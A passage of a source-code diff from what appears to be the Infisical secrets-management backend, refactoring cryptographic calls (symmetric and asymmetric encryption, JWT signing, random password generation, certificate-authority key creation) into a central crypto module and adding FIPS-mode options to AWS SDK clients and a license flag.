                 encryptedHeadersIV && encryptedHeadersCiphertext && encryptedHeadersTag
                   ? (JSON.parse(
-                      infisicalSymmetricDecrypt({
+                      crypto
-                        keyEncoding: encryptedHeadersKeyEncoding as SecretKeyEncoding,
+                        .encryption()
-                        iv: encryptedHeadersIV,
+                        .symmetric()
-                        tag: encryptedHeadersTag,
+                        .decryptWithRootEncryptionKey({
-                        ciphertext: encryptedHeadersCiphertext
+                          keyEncoding: encryptedHeadersKeyEncoding as SecretKeyEncoding,
-                      })
+                          iv: encryptedHeadersIV,
+                          tag: encryptedHeadersTag,
+                          ciphertext: encryptedHeadersCiphertext
+                        })
                     ) as LogStreamHeaders[])
                   : [];
 
@@ -216,12 +219,15 @@ export const auditLogQueueServiceFactory = async ({
           const streamHeaders =
             encryptedHeadersIV && encryptedHeadersCiphertext && encryptedHeadersTag
               ? (JSON.parse(
-                  infisicalSymmetricDecrypt({
+                  crypto
-                    keyEncoding: encryptedHeadersKeyEncoding as SecretKeyEncoding,
+                    .encryption()
-                    iv: encryptedHeadersIV,
+                    .symmetric()
-                    tag: encryptedHeadersTag,
+                    .decryptWithRootEncryptionKey({
-                    ciphertext: encryptedHeadersCiphertext
+                      keyEncoding: encryptedHeadersKeyEncoding as SecretKeyEncoding,
-                  })
+                      iv: encryptedHeadersIV,
+                      tag: encryptedHeadersTag,
+                      ciphertext: encryptedHeadersCiphertext
+                    })
                 ) as LogStreamHeaders[])
               : [];
 

backend/src/ee/services/dynamic-secret/providers/aws-elasticache.ts

@@ -12,6 +12,8 @@ import handlebars from "handlebars";
 import { customAlphabet } from "nanoid";
 import { z } from "zod";
 
+import { CustomAWSHasher } from "@app/lib/aws/hashing";
+import { crypto } from "@app/lib/crypto";
 import { BadRequestError } from "@app/lib/errors";
 import { validateHandlebarTemplate } from "@app/lib/template/validate-handlebars";
 
@@ -39,8 +41,11 @@ type TDeleteElastiCacheUserInput = z.infer<typeof DeleteElasticCacheUserSchema>;
 const ElastiCacheUserManager = (credentials: TBasicAWSCredentials, region: string) => {
   const elastiCache = new ElastiCache({
     region,
+    useFipsEndpoint: crypto.isFipsModeEnabled(),
+    sha256: CustomAWSHasher,
     credentials
   });
+
   const infisicalGroup = "infisical-managed-group-elasticache";
 
   const ensureInfisicalGroupExists = async (clusterName: string) => {

backend/src/ee/services/dynamic-secret/providers/aws-iam.ts

@@ -17,10 +17,11 @@ import {
   RemoveUserFromGroupCommand
 } from "@aws-sdk/client-iam";
 import { AssumeRoleCommand, STSClient } from "@aws-sdk/client-sts";
-import { randomUUID } from "crypto";
 import { z } from "zod";
 
+import { CustomAWSHasher } from "@app/lib/aws/hashing";
 import { getConfig } from "@app/lib/config/env";
+import { crypto } from "@app/lib/crypto/cryptography";
 import { BadRequestError, UnauthorizedError } from "@app/lib/errors";
 import { alphaNumericNanoId } from "@app/lib/nanoid";
 
@@ -49,6 +50,8 @@ export const AwsIamProvider = (): TDynamicProviderFns => {
     if (providerInputs.method === AwsIamAuthType.AssumeRole) {
       const stsClient = new STSClient({
         region: providerInputs.region,
+        useFipsEndpoint: crypto.isFipsModeEnabled(),
+        sha256: CustomAWSHasher,
         credentials:
           appCfg.DYNAMIC_SECRET_AWS_ACCESS_KEY_ID && appCfg.DYNAMIC_SECRET_AWS_SECRET_ACCESS_KEY
             ? {
@@ -60,7 +63,7 @@ export const AwsIamProvider = (): TDynamicProviderFns => {
 
       const command = new AssumeRoleCommand({
         RoleArn: providerInputs.roleArn,
-        RoleSessionName: `infisical-dynamic-secret-${randomUUID()}`,
+        RoleSessionName: `infisical-dynamic-secret-${crypto.rawCrypto.randomUUID()}`,
         DurationSeconds: 900, // 15 mins
         ExternalId: projectId
       });
@@ -72,6 +75,8 @@ export const AwsIamProvider = (): TDynamicProviderFns => {
       }
       const client = new IAMClient({
         region: providerInputs.region,
+        useFipsEndpoint: crypto.isFipsModeEnabled(),
+        sha256: CustomAWSHasher,
         credentials: {
           accessKeyId: assumeRes.Credentials?.AccessKeyId,
           secretAccessKey: assumeRes.Credentials?.SecretAccessKey,
@@ -91,13 +96,17 @@ export const AwsIamProvider = (): TDynamicProviderFns => {
 
       // The SDK will automatically pick up credentials from the environment
       const client = new IAMClient({
-        region: providerInputs.region
+        region: providerInputs.region,
+        useFipsEndpoint: crypto.isFipsModeEnabled(),
+        sha256: CustomAWSHasher
       });
       return client;
     }
 
     const client = new IAMClient({
       region: providerInputs.region,
+      useFipsEndpoint: crypto.isFipsModeEnabled(),
+      sha256: CustomAWSHasher,
       credentials: {
         accessKeyId: providerInputs.accessKey,
         secretAccessKey: providerInputs.secretAccessKey

backend/src/ee/services/dynamic-secret/providers/github.ts

@@ -1,6 +1,7 @@
 import axios from "axios";
 import jwt from "jsonwebtoken";
 
+import { crypto } from "@app/lib/crypto";
 import { BadRequestError, InternalServerError } from "@app/lib/errors";
 import { alphaNumericNanoId } from "@app/lib/nanoid";
 import { IntegrationUrls } from "@app/services/integration-auth/integration-list";
@@ -40,7 +41,7 @@ export const GithubProvider = (): TDynamicProviderFns => {
 
     let appJwt: string;
     try {
-      appJwt = jwt.sign(jwtPayload, privateKey, { algorithm: "RS256" });
+      appJwt = crypto.jwt().sign(jwtPayload, privateKey, { algorithm: "RS256" });
     } catch (error) {
       let message = "Failed to sign JWT.";
       if (error instanceof jwt.JsonWebTokenError) {

backend/src/ee/services/dynamic-secret/providers/sql-database.ts

@@ -1,8 +1,8 @@
-import { randomInt } from "crypto";
 import handlebars from "handlebars";
 import knex from "knex";
 import { z } from "zod";
 
+import { crypto } from "@app/lib/crypto/cryptography";
 import { GatewayProxyProtocol, withGatewayProxy } from "@app/lib/gateway";
 import { alphaNumericNanoId } from "@app/lib/nanoid";
 import { validateHandlebarTemplate } from "@app/lib/template/validate-handlebars";
@@ -50,7 +50,7 @@ const generatePassword = (provider: SqlProviders, requirements?: PasswordRequire
       parts.push(
         ...Array(required.lowercase)
           .fill(0)
-          .map(() => chars.lowercase[randomInt(chars.lowercase.length)])
+          .map(() => chars.lowercase[crypto.randomInt(chars.lowercase.length)])
       );
     }
 
@@ -58,7 +58,7 @@ const generatePassword = (provider: SqlProviders, requirements?: PasswordRequire
       parts.push(
         ...Array(required.uppercase)
           .fill(0)
-          .map(() => chars.uppercase[randomInt(chars.uppercase.length)])
+          .map(() => chars.uppercase[crypto.randomInt(chars.uppercase.length)])
       );
     }
 
@@ -66,7 +66,7 @@ const generatePassword = (provider: SqlProviders, requirements?: PasswordRequire
       parts.push(
         ...Array(required.digits)
           .fill(0)
-          .map(() => chars.digits[randomInt(chars.digits.length)])
+          .map(() => chars.digits[crypto.randomInt(chars.digits.length)])
       );
     }
 
@@ -74,7 +74,7 @@ const generatePassword = (provider: SqlProviders, requirements?: PasswordRequire
       parts.push(
         ...Array(required.symbols)
           .fill(0)
-          .map(() => chars.symbols[randomInt(chars.symbols.length)])
+          .map(() => chars.symbols[crypto.randomInt(chars.symbols.length)])
       );
     }
 
@@ -89,12 +89,12 @@ const generatePassword = (provider: SqlProviders, requirements?: PasswordRequire
     parts.push(
       ...Array(remainingLength)
         .fill(0)
-        .map(() => allowedChars[randomInt(allowedChars.length)])
+        .map(() => allowedChars[crypto.randomInt(allowedChars.length)])
     );
 
     // shuffle the array to mix up the characters
     for (let i = parts.length - 1; i > 0; i -= 1) {
-      const j = randomInt(i + 1);
+      const j = crypto.randomInt(i + 1);
       [parts[i], parts[j]] = [parts[j], parts[i]];
     }
 

backend/src/ee/services/dynamic-secret/providers/vertica.ts

@@ -1,8 +1,8 @@
-import { randomInt } from "crypto";
 import handlebars from "handlebars";
 import knex, { Knex } from "knex";
 import { z } from "zod";
 
+import { crypto } from "@app/lib/crypto/cryptography";
 import { BadRequestError } from "@app/lib/errors";
 import { GatewayProxyProtocol, withGatewayProxy } from "@app/lib/gateway";
 import { logger } from "@app/lib/logger";
@@ -64,7 +64,7 @@ const generatePassword = (requirements?: PasswordRequirements) => {
       parts.push(
         ...Array(required.lowercase)
           .fill(0)
-          .map(() => chars.lowercase[randomInt(chars.lowercase.length)])
+          .map(() => chars.lowercase[crypto.randomInt(chars.lowercase.length)])
       );
     }
 
@@ -72,7 +72,7 @@ const generatePassword = (requirements?: PasswordRequirements) => {
       parts.push(
         ...Array(required.uppercase)
           .fill(0)
-          .map(() => chars.uppercase[randomInt(chars.uppercase.length)])
+          .map(() => chars.uppercase[crypto.randomInt(chars.uppercase.length)])
       );
     }
 
@@ -80,7 +80,7 @@ const generatePassword = (requirements?: PasswordRequirements) => {
       parts.push(
         ...Array(required.digits)
           .fill(0)
-          .map(() => chars.digits[randomInt(chars.digits.length)])
+          .map(() => chars.digits[crypto.randomInt(chars.digits.length)])
       );
     }
 
@@ -88,7 +88,7 @@ const generatePassword = (requirements?: PasswordRequirements) => {
       parts.push(
         ...Array(required.symbols)
           .fill(0)
-          .map(() => chars.symbols[randomInt(chars.symbols.length)])
+          .map(() => chars.symbols[crypto.randomInt(chars.symbols.length)])
       );
     }
 
@@ -103,12 +103,12 @@ const generatePassword = (requirements?: PasswordRequirements) => {
     parts.push(
       ...Array(remainingLength)
         .fill(0)
-        .map(() => allowedChars[randomInt(allowedChars.length)])
+        .map(() => allowedChars[crypto.randomInt(allowedChars.length)])
     );
 
     // shuffle the array to mix up the characters
     for (let i = parts.length - 1; i > 0; i -= 1) {
-      const j = randomInt(i + 1);
+      const j = crypto.randomInt(i + 1);
       [parts[i], parts[j]] = [parts[j], parts[i]];
     }
 

backend/src/ee/services/external-kms/providers/aws-kms.ts

@@ -1,6 +1,8 @@
 import { CreateKeyCommand, DecryptCommand, DescribeKeyCommand, EncryptCommand, KMSClient } from "@aws-sdk/client-kms";
 import { AssumeRoleCommand, STSClient } from "@aws-sdk/client-sts";
-import { randomUUID } from "crypto";
+
+import { CustomAWSHasher } from "@app/lib/aws/hashing";
+import { crypto } from "@app/lib/crypto/cryptography";
 
 import { ExternalKmsAwsSchema, KmsAwsCredentialType, TExternalKmsAwsSchema, TExternalKmsProviderFns } from "./model";
 
@@ -8,11 +10,13 @@ const getAwsKmsClient = async (providerInputs: TExternalKmsAwsSchema) => {
   if (providerInputs.credential.type === KmsAwsCredentialType.AssumeRole) {
     const awsCredential = providerInputs.credential.data;
     const stsClient = new STSClient({
-      region: providerInputs.awsRegion
+      region: providerInputs.awsRegion,
+      useFipsEndpoint: crypto.isFipsModeEnabled(),
+      sha256: CustomAWSHasher
     });
     const command = new AssumeRoleCommand({
       RoleArn: awsCredential.assumeRoleArn,
-      RoleSessionName: `infisical-kms-${randomUUID()}`,
+      RoleSessionName: `infisical-kms-${crypto.rawCrypto.randomUUID()}`,
       DurationSeconds: 900, // 15mins
       ExternalId: awsCredential.externalId
     });
@@ -22,6 +26,8 @@ const getAwsKmsClient = async (providerInputs: TExternalKmsAwsSchema) => {
 
     const kmsClient = new KMSClient({
       region: providerInputs.awsRegion,
+      useFipsEndpoint: crypto.isFipsModeEnabled(),
+      sha256: CustomAWSHasher,
       credentials: {
         accessKeyId: response.Credentials.AccessKeyId,
         secretAccessKey: response.Credentials.SecretAccessKey,
@@ -34,6 +40,8 @@ const getAwsKmsClient = async (providerInputs: TExternalKmsAwsSchema) => {
   const awsCredential = providerInputs.credential.data;
   const kmsClient = new KMSClient({
     region: providerInputs.awsRegion,
+    useFipsEndpoint: crypto.isFipsModeEnabled(),
+    sha256: CustomAWSHasher,
     credentials: {
       accessKeyId: awsCredential.accessKey,
       secretAccessKey: awsCredential.secretKey

backend/src/ee/services/gateway/gateway-service.ts

@@ -1,11 +1,10 @@
-import crypto from "node:crypto";
-
 import { ForbiddenError } from "@casl/ability";
 import * as x509 from "@peculiar/x509";
 import { z } from "zod";
 
 import { KeyStorePrefixes, PgSqlLock, TKeyStoreFactory } from "@app/keystore/keystore";
 import { getConfig } from "@app/lib/config/env";
+import { crypto } from "@app/lib/crypto/cryptography";
 import { BadRequestError, NotFoundError } from "@app/lib/errors";
 import { pingGatewayAndVerify } from "@app/lib/gateway";
 import { alphaNumericNanoId } from "@app/lib/nanoid";
@@ -149,9 +148,9 @@ export const gatewayServiceFactory = ({
 
       const alg = keyAlgorithmToAlgCfg(CertKeyAlgorithm.RSA_2048);
       // generate root CA
-      const rootCaKeys = await crypto.subtle.generateKey(alg, true, ["sign", "verify"]);
+      const rootCaKeys = await crypto.rawCrypto.subtle.generateKey(alg, true, ["sign", "verify"]);
       const rootCaSerialNumber = createSerialNumber();
-      const rootCaSkObj = crypto.KeyObject.from(rootCaKeys.privateKey);
+      const rootCaSkObj = crypto.rawCrypto.KeyObject.from(rootCaKeys.privateKey);
       const rootCaIssuedAt = new Date();
       const rootCaKeyAlgorithm = CertKeyAlgorithm.RSA_2048;
       const rootCaExpiration = new Date(new Date().setFullYear(2045));
@@ -173,8 +172,8 @@ export const gatewayServiceFactory = ({
       const clientCaSerialNumber = createSerialNumber();
       const clientCaIssuedAt = new Date();
       const clientCaExpiration = new Date(new Date().setFullYear(2045));
-      const clientCaKeys = await crypto.subtle.generateKey(alg, true, ["sign", "verify"]);
+      const clientCaKeys = await crypto.rawCrypto.subtle.generateKey(alg, true, ["sign", "verify"]);
-      const clientCaSkObj = crypto.KeyObject.from(clientCaKeys.privateKey);
+      const clientCaSkObj = crypto.rawCrypto.KeyObject.from(clientCaKeys.privateKey);
 
       const clientCaCert = await x509.X509CertificateGenerator.create({
         serialNumber: clientCaSerialNumber,
@@ -200,7 +199,7 @@ export const gatewayServiceFactory = ({
         ]
       });
 
-      const clientKeys = await crypto.subtle.generateKey(alg, true, ["sign", "verify"]);
+      const clientKeys = await crypto.rawCrypto.subtle.generateKey(alg, true, ["sign", "verify"]);
       const clientCertSerialNumber = createSerialNumber();
       const clientCert = await x509.X509CertificateGenerator.create({
         serialNumber: clientCertSerialNumber,
@@ -226,14 +225,14 @@ export const gatewayServiceFactory = ({
           new x509.ExtendedKeyUsageExtension([x509.ExtendedKeyUsage[CertExtendedKeyUsage.CLIENT_AUTH]], true)
         ]
       });
-      const clientSkObj = crypto.KeyObject.from(clientKeys.privateKey);
+      const clientSkObj = crypto.rawCrypto.KeyObject.from(clientKeys.privateKey);
 
       // generate gateway ca
       const gatewayCaSerialNumber = createSerialNumber();
       const gatewayCaIssuedAt = new Date();
       const gatewayCaExpiration = new Date(new Date().setFullYear(2045));
-      const gatewayCaKeys = await crypto.subtle.generateKey(alg, true, ["sign", "verify"]);
+      const gatewayCaKeys = await crypto.rawCrypto.subtle.generateKey(alg, true, ["sign", "verify"]);
-      const gatewayCaSkObj = crypto.KeyObject.from(gatewayCaKeys.privateKey);
+      const gatewayCaSkObj = crypto.rawCrypto.KeyObject.from(gatewayCaKeys.privateKey);
       const gatewayCaCert = await x509.X509CertificateGenerator.create({
         serialNumber: gatewayCaSerialNumber,
         subject: `O=${identityOrg},CN=Gateway CA`,
@@ -326,7 +325,7 @@ export const gatewayServiceFactory = ({
     );
 
     const gatewayCaAlg = keyAlgorithmToAlgCfg(orgGatewayConfig.rootCaKeyAlgorithm as CertKeyAlgorithm);
-    const gatewayCaSkObj = crypto.createPrivateKey({
+    const gatewayCaSkObj = crypto.rawCrypto.createPrivateKey({
       key: orgKmsDecryptor({ cipherTextBlob: orgGatewayConfig.encryptedGatewayCaPrivateKey }),
       format: "der",
       type: "pkcs8"
@@ -337,7 +336,7 @@ export const gatewayServiceFactory = ({
       })
     );
 
-    const gatewayCaPrivateKey = await crypto.subtle.importKey(
+    const gatewayCaPrivateKey = await crypto.rawCrypto.subtle.importKey(
       "pkcs8",
       gatewayCaSkObj.export({ format: "der", type: "pkcs8" }),
       gatewayCaAlg,
@@ -346,7 +345,7 @@ export const gatewayServiceFactory = ({
     );
 
     const alg = keyAlgorithmToAlgCfg(CertKeyAlgorithm.RSA_2048);
-    const gatewayKeys = await crypto.subtle.generateKey(alg, true, ["sign", "verify"]);
+    const gatewayKeys = await crypto.rawCrypto.subtle.generateKey(alg, true, ["sign", "verify"]);
     const certIssuedAt = new Date();
     // then need to periodically init
     const certExpireAt = new Date(new Date().setMonth(new Date().getMonth() + 1));
@@ -367,7 +366,7 @@ export const gatewayServiceFactory = ({
     ];
 
     const serialNumber = createSerialNumber();
-    const privateKey = crypto.KeyObject.from(gatewayKeys.privateKey);
+    const privateKey = crypto.rawCrypto.KeyObject.from(gatewayKeys.privateKey);
     const gatewayCertificate = await x509.X509CertificateGenerator.create({
       serialNumber,
       subject: `CN=${identityId},O=${identityOrg},OU=Gateway`,
@@ -454,7 +453,7 @@ export const gatewayServiceFactory = ({
       })
     );
 
-    const privateKey = crypto
+    const privateKey = crypto.rawCrypto
       .createPrivateKey({
         key: orgKmsDecryptor({ cipherTextBlob: orgGatewayConfig.encryptedClientPrivateKey }),
         format: "der",
@@ -588,7 +587,7 @@ export const gatewayServiceFactory = ({
       })
     );
 
-    const clientSkObj = crypto.createPrivateKey({
+    const clientSkObj = crypto.rawCrypto.createPrivateKey({
       key: orgKmsDecryptor({ cipherTextBlob: orgGatewayConfig.encryptedClientPrivateKey }),
       format: "der",
       type: "pkcs8"

backend/src/ee/services/group/group-fns.ts

@@ -1,7 +1,7 @@
 import { Knex } from "knex";
 
 import { SecretKeyEncoding, TableName, TUsers } from "@app/db/schemas";
-import { decryptAsymmetric, encryptAsymmetric, infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
+import { crypto } from "@app/lib/crypto/cryptography";
 import { BadRequestError, ForbiddenRequestError, NotFoundError, ScimRequestError } from "@app/lib/errors";
 
 import {
@@ -94,14 +94,17 @@ const addAcceptedUsersToGroup = async ({
         });
       }
 
-      const botPrivateKey = infisicalSymmetricDecrypt({
+      const botPrivateKey = crypto
-        keyEncoding: bot.keyEncoding as SecretKeyEncoding,
+        .encryption()
-        iv: bot.iv,
+        .symmetric()
-        tag: bot.tag,
+        .decryptWithRootEncryptionKey({
-        ciphertext: bot.encryptedPrivateKey
+          keyEncoding: bot.keyEncoding as SecretKeyEncoding,
-      });
+          iv: bot.iv,
+          tag: bot.tag,
+          ciphertext: bot.encryptedPrivateKey
+        });
 
-      const plaintextProjectKey = decryptAsymmetric({
+      const plaintextProjectKey = crypto.encryption().asymmetric().decrypt({
         ciphertext: ghostUserLatestKey.encryptedKey,
         nonce: ghostUserLatestKey.nonce,
         publicKey: ghostUserLatestKey.sender.publicKey,
@@ -109,11 +112,10 @@ const addAcceptedUsersToGroup = async ({
       });
 
       const projectKeysToAdd = usersToAddProjectKeyFor.map((user) => {
-        const { ciphertext: encryptedKey, nonce } = encryptAsymmetric(
+        const { ciphertext: encryptedKey, nonce } = crypto
-          plaintextProjectKey,
+          .encryption()
-          user.publicKey,
+          .asymmetric()
-          botPrivateKey
+          .encrypt(plaintextProjectKey, user.publicKey, botPrivateKey);
-        );
         return {
           encryptedKey,
           nonce,

backend/src/ee/services/kmip/kmip-service.ts

@@ -1,7 +1,7 @@
 import { ForbiddenError } from "@casl/ability";
 import * as x509 from "@peculiar/x509";
-import crypto, { KeyObject } from "crypto";
 
+import { crypto } from "@app/lib/crypto/cryptography";
 import { BadRequestError, InternalServerError, NotFoundError } from "@app/lib/errors";
 import { isValidIp } from "@app/lib/ip";
 import { ms } from "@app/lib/ms";
@@ -67,6 +67,12 @@ export const kmipServiceFactory = ({
     description,
     permissions
   }: TCreateKmipClientDTO) => {
+    if (crypto.isFipsModeEnabled()) {
+      throw new BadRequestError({
+        message: "KMIP is currently not supported in FIPS mode of operation."
+      });
+    }
+
     const { permission } = await permissionService.getProjectPermission({
       actor,
       actorId,
@@ -292,7 +298,7 @@ export const kmipServiceFactory = ({
     }
 
     const alg = keyAlgorithmToAlgCfg(keyAlgorithm);
-    const leafKeys = await crypto.subtle.generateKey(alg, true, ["sign", "verify"]);
+    const leafKeys = await crypto.rawCrypto.subtle.generateKey(alg, true, ["sign", "verify"]);
 
     const extensions: x509.Extension[] = [
       new x509.BasicConstraintsExtension(false),
@@ -311,13 +317,13 @@ export const kmipServiceFactory = ({
 
     const caAlg = keyAlgorithmToAlgCfg(kmipConfig.caKeyAlgorithm as CertKeyAlgorithm);
 
-    const caSkObj = crypto.createPrivateKey({
+    const caSkObj = crypto.rawCrypto.createPrivateKey({
       key: decryptor({ cipherTextBlob: kmipConfig.encryptedClientIntermediateCaPrivateKey }),
       format: "der",
       type: "pkcs8"
     });
 
-    const caPrivateKey = await crypto.subtle.importKey(
+    const caPrivateKey = await crypto.rawCrypto.subtle.importKey(
       "pkcs8",
       caSkObj.export({ format: "der", type: "pkcs8" }),
       caAlg,
@@ -338,7 +344,7 @@ export const kmipServiceFactory = ({
       extensions
     });
 
-    const skLeafObj = KeyObject.from(leafKeys.privateKey);
+    const skLeafObj = crypto.rawCrypto.KeyObject.from(leafKeys.privateKey);
 
     const rootCaCert = new x509.X509Certificate(decryptor({ cipherTextBlob: kmipConfig.encryptedRootCaCertificate }));
     const serverIntermediateCaCert = new x509.X509Certificate(
@@ -417,8 +423,8 @@ export const kmipServiceFactory = ({
 
     // generate root CA
     const rootCaSerialNumber = createSerialNumber();
-    const rootCaKeys = await crypto.subtle.generateKey(alg, true, ["sign", "verify"]);
+    const rootCaKeys = await crypto.rawCrypto.subtle.generateKey(alg, true, ["sign", "verify"]);
-    const rootCaSkObj = KeyObject.from(rootCaKeys.privateKey);
+    const rootCaSkObj = crypto.rawCrypto.KeyObject.from(rootCaKeys.privateKey);
     const rootCaIssuedAt = new Date();
     const rootCaExpiration = new Date(new Date().setFullYear(new Date().getFullYear() + 20));
 
@@ -440,8 +446,8 @@ export const kmipServiceFactory = ({
     const serverIntermediateCaSerialNumber = createSerialNumber();
     const serverIntermediateCaIssuedAt = new Date();
     const serverIntermediateCaExpiration = new Date(new Date().setFullYear(new Date().getFullYear() + 10));
-    const serverIntermediateCaKeys = await crypto.subtle.generateKey(alg, true, ["sign", "verify"]);
+    const serverIntermediateCaKeys = await crypto.rawCrypto.subtle.generateKey(alg, true, ["sign", "verify"]);
-    const serverIntermediateCaSkObj = KeyObject.from(serverIntermediateCaKeys.privateKey);
+    const serverIntermediateCaSkObj = crypto.rawCrypto.KeyObject.from(serverIntermediateCaKeys.privateKey);
 
     const serverIntermediateCaCert = await x509.X509CertificateGenerator.create({
       serialNumber: serverIntermediateCaSerialNumber,
@@ -471,8 +477,8 @@ export const kmipServiceFactory = ({
     const clientIntermediateCaSerialNumber = createSerialNumber();
     const clientIntermediateCaIssuedAt = new Date();
     const clientIntermediateCaExpiration = new Date(new Date().setFullYear(new Date().getFullYear() + 10));
-    const clientIntermediateCaKeys = await crypto.subtle.generateKey(alg, true, ["sign", "verify"]);
+    const clientIntermediateCaKeys = await crypto.rawCrypto.subtle.generateKey(alg, true, ["sign", "verify"]);
-    const clientIntermediateCaSkObj = KeyObject.from(clientIntermediateCaKeys.privateKey);
+    const clientIntermediateCaSkObj = crypto.rawCrypto.KeyObject.from(clientIntermediateCaKeys.privateKey);
 
     const clientIntermediateCaCert = await x509.X509CertificateGenerator.create({
       serialNumber: clientIntermediateCaSerialNumber,
@@ -637,7 +643,8 @@ export const kmipServiceFactory = ({
     }
 
     const alg = keyAlgorithmToAlgCfg(keyAlgorithm);
-    const leafKeys = await crypto.subtle.generateKey(alg, true, ["sign", "verify"]);
+
+    const leafKeys = await crypto.rawCrypto.subtle.generateKey(alg, true, ["sign", "verify"]);
 
     const extensions: x509.Extension[] = [
       new x509.BasicConstraintsExtension(false),
@@ -685,13 +692,13 @@ export const kmipServiceFactory = ({
       cipherTextBlob: kmipOrgConfig.encryptedServerIntermediateCaChain
     }).toString("utf-8");
 
-    const caSkObj = crypto.createPrivateKey({
+    const caSkObj = crypto.rawCrypto.createPrivateKey({
       key: decryptor({ cipherTextBlob: kmipOrgConfig.encryptedServerIntermediateCaPrivateKey }),
       format: "der",
       type: "pkcs8"
     });
 
-    const caPrivateKey = await crypto.subtle.importKey(
+    const caPrivateKey = await crypto.rawCrypto.subtle.importKey(
       "pkcs8",
       caSkObj.export({ format: "der", type: "pkcs8" }),
       caAlg,
@@ -712,7 +719,7 @@ export const kmipServiceFactory = ({
       extensions
     });
 
-    const skLeafObj = KeyObject.from(leafKeys.privateKey);
+    const skLeafObj = crypto.rawCrypto.KeyObject.from(leafKeys.privateKey);
     const certificateChain = `${caCertObj.toString("pem")}\n${decryptedCaCertChain}`.trim();
 
     await kmipOrgServerCertificateDAL.create({

backend/src/ee/services/ldap-config/ldap-config-service.ts

@@ -1,11 +1,11 @@
 import { ForbiddenError } from "@casl/ability";
-import jwt from "jsonwebtoken";
 
 import { OrgMembershipStatus, TableName, TLdapConfigsUpdate, TUsers } from "@app/db/schemas";
 import { TGroupDALFactory } from "@app/ee/services/group/group-dal";
 import { addUsersToGroupByUserIds, removeUsersFromGroupByUserIds } from "@app/ee/services/group/group-fns";
 import { TUserGroupMembershipDALFactory } from "@app/ee/services/group/user-group-membership-dal";
 import { getConfig } from "@app/lib/config/env";
+import { crypto } from "@app/lib/crypto";
 import { BadRequestError, ForbiddenRequestError, NotFoundError } from "@app/lib/errors";
 import { AuthMethod, AuthTokenType } from "@app/services/auth/auth-type";
 import { TAuthTokenServiceFactory } from "@app/services/auth-token/auth-token-service";
@@ -529,7 +529,7 @@ export const ldapConfigServiceFactory = ({
     const isUserCompleted = Boolean(user.isAccepted);
     const userEnc = await userDAL.findUserEncKeyByUserId(user.id);
 
-    const providerAuthToken = jwt.sign(
+    const providerAuthToken = crypto.jwt().sign(
       {
         authTokenType: AuthTokenType.PROVIDER_TOKEN,
         userId: user.id,

backend/src/ee/services/license/license-fns.ts

@@ -58,7 +58,8 @@ export const getDefaultOnPremFeatures = (): TFeatureSet => ({
   sshHostGroups: false,
   secretScanning: false,
   enterpriseSecretSyncs: false,
-  enterpriseAppConnections: false
+  enterpriseAppConnections: false,
+  fips: false
 });
 
 export const setupLicenseRequestWithStore = (

backend/src/ee/services/license/license-types.ts

@@ -75,6 +75,7 @@ export type TFeatureSet = {
   secretScanning: false;
   enterpriseSecretSyncs: false;
   enterpriseAppConnections: false;
+  fips: false;
 };
 
 export type TOrgPlansTableDTO = {

backend/src/ee/services/oidc/oidc-config-service.ts

@@ -1,6 +1,5 @@
 /* eslint-disable @typescript-eslint/no-unsafe-call */
 import { ForbiddenError } from "@casl/ability";
-import jwt from "jsonwebtoken";
 import { Issuer, Issuer as OpenIdIssuer, Strategy as OpenIdStrategy, TokenSet } from "openid-client";
 
 import { OrgMembershipStatus, TableName, TUsers } from "@app/db/schemas";
@@ -13,6 +12,7 @@ import { TLicenseServiceFactory } from "@app/ee/services/license/license-service
 import { OrgPermissionActions, OrgPermissionSubjects } from "@app/ee/services/permission/org-permission";
 import { TPermissionServiceFactory } from "@app/ee/services/permission/permission-service-types";
 import { getConfig } from "@app/lib/config/env";
+import { crypto } from "@app/lib/crypto";
 import { BadRequestError, ForbiddenRequestError, NotFoundError, OidcAuthError } from "@app/lib/errors";
 import { OrgServiceActor } from "@app/lib/types";
 import { ActorType, AuthMethod, AuthTokenType } from "@app/services/auth/auth-type";
@@ -406,7 +406,7 @@ export const oidcConfigServiceFactory = ({
 
     const userEnc = await userDAL.findUserEncKeyByUserId(user.id);
     const isUserCompleted = Boolean(user.isAccepted);
-    const providerAuthToken = jwt.sign(
+    const providerAuthToken = crypto.jwt().sign(
       {
         authTokenType: AuthTokenType.PROVIDER_TOKEN,
         userId: user.id,

backend/src/ee/services/saml-config/saml-config-service.ts

@@ -1,8 +1,8 @@
 import { ForbiddenError } from "@casl/ability";
-import jwt from "jsonwebtoken";
 
 import { OrgMembershipStatus, TableName, TSamlConfigs, TSamlConfigsUpdate, TUsers } from "@app/db/schemas";
 import { getConfig } from "@app/lib/config/env";
+import { crypto } from "@app/lib/crypto";
 import { BadRequestError, ForbiddenRequestError, NotFoundError } from "@app/lib/errors";
 import { AuthTokenType } from "@app/services/auth/auth-type";
 import { TAuthTokenServiceFactory } from "@app/services/auth-token/auth-token-service";
@@ -412,7 +412,7 @@ export const samlConfigServiceFactory = ({
 
     const isUserCompleted = Boolean(user.isAccepted);
     const userEnc = await userDAL.findUserEncKeyByUserId(user.id);
-    const providerAuthToken = jwt.sign(
+    const providerAuthToken = crypto.jwt().sign(
       {
         authTokenType: AuthTokenType.PROVIDER_TOKEN,
         userId: user.id,

backend/src/ee/services/scim/scim-service.ts

@@ -1,6 +1,5 @@
 import { ForbiddenError } from "@casl/ability";
 import slugify from "@sindresorhus/slugify";
-import jwt from "jsonwebtoken";
 import { scimPatch } from "scim-patch";
 
 import { OrgMembershipRole, OrgMembershipStatus, TableName, TGroups, TOrgMemberships, TUsers } from "@app/db/schemas";
@@ -10,6 +9,7 @@ import { TUserGroupMembershipDALFactory } from "@app/ee/services/group/user-grou
 import { TScimDALFactory } from "@app/ee/services/scim/scim-dal";
 import { getConfig } from "@app/lib/config/env";
 import { BadRequestError, NotFoundError, ScimRequestError, UnauthorizedError } from "@app/lib/errors";
+import { crypto } from "@app/lib/crypto";
 import { alphaNumericNanoId } from "@app/lib/nanoid";
 import { AuthTokenType } from "@app/services/auth/auth-type";
 import { TExternalGroupOrgRoleMappingDALFactory } from "@app/services/external-group-org-role-mapping/external-group-org-role-mapping-dal";
@@ -137,7 +137,7 @@ export const scimServiceFactory = ({
       ttlDays
     });
 
-    const scimToken = jwt.sign(
+    const scimToken = crypto.jwt().sign(
       {
         scimTokenId: scimTokenData.id,
         authTokenType: AuthTokenType.SCIM_TOKEN

backend/src/ee/services/secret-approval-request/secret-approval-request-service.ts

@@ -12,7 +12,7 @@ import {
 } from "@app/db/schemas";
 import { Event, EventType } from "@app/ee/services/audit-log/audit-log-types";
 import { getConfig } from "@app/lib/config/env";
-import { decryptSymmetric128BitHexKeyUTF8 } from "@app/lib/crypto";
